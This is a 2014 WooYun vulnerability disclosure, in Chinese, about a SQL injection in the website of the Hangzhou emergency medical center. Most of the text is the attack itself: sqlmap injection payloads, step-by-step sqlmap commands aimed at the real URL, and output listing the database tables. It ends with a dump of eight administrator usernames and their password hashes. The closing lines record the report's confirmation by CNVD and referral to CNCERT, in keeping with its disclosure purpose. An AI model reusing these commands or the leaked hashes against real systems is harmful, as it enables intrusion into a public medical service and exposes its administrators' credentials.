乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-19: 细节已通知厂商并且等待厂商处理中 2014-05-23: 厂商已经确认,细节仅向厂商公开 2014-06-02: 细节向核心白帽子及相关领域专家公开 2014-06-12: 细节向普通白帽子公开 2014-06-22: 细节向实习白帽子公开 2014-07-03: 细节向公众公开
看我如何"四步"拿下#浙江省杭州市急救中心数据库#大量敏感信息泄露
MySql注入漏洞导致数据库泄露注入地址:
http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78
---Place: GETParameter: classid Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: classid=52 AND (SELECT 9444 FROM(SELECT COUNT(*),CONCAT(0x3a7170643a,(SELECT (CASE WHEN (9444=9444) THEN 1 ELSE 0 END)),0x3a6677633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=78 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: classid=52 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7170643a,0x70415046774c696d6662,0x3a6677633a)#&id=78 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: classid=52 AND SLEEP(5)&id=78Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: classid=52&id=78 AND 3941=3941 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: classid=52&id=78 AND (SELECT 3525 FROM(SELECT COUNT(*),CONCAT(0x3a7170643a,(SELECT (CASE WHEN (3525=3525) THEN 1 ELSE 0 END)),0x3a6677633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: classid=52&id=78 AND SLEEP(5)---
#1、获取数据库列表:
./sqlmap.py -u "http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78" --dbs
available databases [2]:[*] hangzhou120[*] information_schema
#2、获取表段:
./sqlmap.py -u "http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78" -D hangzhou120 --tables
[41 tables]+--------------------+| hxcms_about || hxcms_addlist || hxcms_address || hxcms_admin || hxcms_adv || hxcms_allsky || hxcms_announce || hxcms_batch || hxcms_bodys || hxcms_bodytest || hxcms_booking || hxcms_buy || hxcms_buycar_model || hxcms_canquery || hxcms_channel || hxcms_class || hxcms_classfiy || hxcms_coll || hxcms_comments || hxcms_config || hxcms_contact || hxcms_dkbuy || hxcms_famous || hxcms_field || hxcms_food || hxcms_honors || hxcms_job || hxcms_joinline || hxcms_member || hxcms_memup || hxcms_network || hxcms_news || hxcms_order || hxcms_orderlist || hxcms_orders || hxcms_product || hxcms_questions || hxcms_resume || hxcms_select || hxcms_travel || hxcms_weblink |+--------------------+
#3、获取字段:
./sqlmap.py -u "http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78" -D hangzhou120 -T hxcms_admin --columns
[8 columns]+---------------+---------------+| Column | Type |+---------------+---------------+| adminclass | varchar(255) || adminConfig | varchar(255) || adminDate | datetime || adminlock | varbinary(20) || adminlov | int(11) || adminName | varchar(255) || adminPassWord | varchar(255) || ID | int(11) |+---------------+---------------+
#4、猜解内容:
./sqlmap.py -u "http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78" -D hangzhou120 -T hxcms_admin -C adminName,adminPassWord --dump
[8 entries]+-----------+----------------------------------+| adminName | adminPassWord |+-----------+----------------------------------+| admin | 51d326e56c9a5a96a0b2ce4b7d7e5398 || login | 9af50b9300892719dd86a168d42858be || medical | 730d428bba8a70414e5f9bd6c76b0db1 || office | dbd1d9adacb60ba31bb49aec76fe00a9 || party | 1d54533d9d94c4557733131e0b4f32c7 || train | cc046ff85e8c55d48e739a630bb3a5a8 || union | 2a9f0855cc76fbd65a9f5b1c39266b57 || wang | 85f7a43e6008e40d5f5a27340fdb4a6b |+-----------+----------------------------------+
还有很多很多,就不一一展示了- -.
:)
危害等级:高
漏洞Rank:10
确认时间:2014-05-23 11:48
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心处置
暂无
